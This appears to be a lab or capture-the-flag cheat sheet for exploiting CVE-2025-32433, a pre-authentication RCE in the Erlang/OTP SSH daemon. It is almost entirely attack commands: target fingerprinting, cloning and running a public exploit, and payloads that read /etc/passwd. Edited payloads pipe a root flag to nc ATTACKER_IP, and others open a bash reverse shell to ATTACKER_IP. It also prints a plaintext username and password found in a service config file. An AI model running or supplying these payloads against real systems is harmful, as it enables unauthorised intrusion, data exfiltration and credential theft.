Pre-authentication RCE in Erlang/OTP SSH daemon.
Affects: Erlang/OTP versions with SSH daemon
# Banner grab
nc TARGET 2222
# Response: SSH-2.0-Erlang/5.2.9
# Via nmap
nmap -sV -p 2222 TARGETIndicators:
- SSH banner contains
Erlang - Often runs on non-standard ports (2222, etc.)
- May only listen on localhost (requires port forward)
Vulnerability: Pre-authentication command execution via malformed SSH channel request.
# Clone exploit
git clone https://github.com/platsecurity/CVE-2025-32433.git
cd CVE-2025-32433
# If service is on localhost, port forward first
ssh user@TARGET -L 2222:127.0.0.1:2222
# Run exploit (default writes to /lab.txt as PoC)
python3 CVE-2025-32433.pyModify the exploit to execute arbitrary commands:
# In exploit, change the command payload:
command = 'os:cmd("cat /root/root.txt | nc ATTACKER_IP 4444").'
# Or for reverse shell:
command = 'os:cmd("bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\'").'% Read file
os:cmd("cat /etc/passwd").
% Command execution
os:cmd("id").
% Exfiltrate via netcat
os:cmd("cat /root/root.txt | nc ATTACKER_IP 4444").
% Reverse shell
os:cmd("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'").# Linpeas output
/usr/local/lib/erlang_login/start.escript
# Process list
ps aux | grep erlang
ps aux | grep ssh_runner
# Listening ports
ss -tlnp | grep erlang
netstat -tlnp | grep 2222Erlang SSH daemons may have credentials in config:
% Example from start.escript
{user_passwords, [{"ben", "HouseH0ldings998"}]}Common locations:
/usr/local/lib/erlang_login/start.escript
/opt/erlang/*/start.escript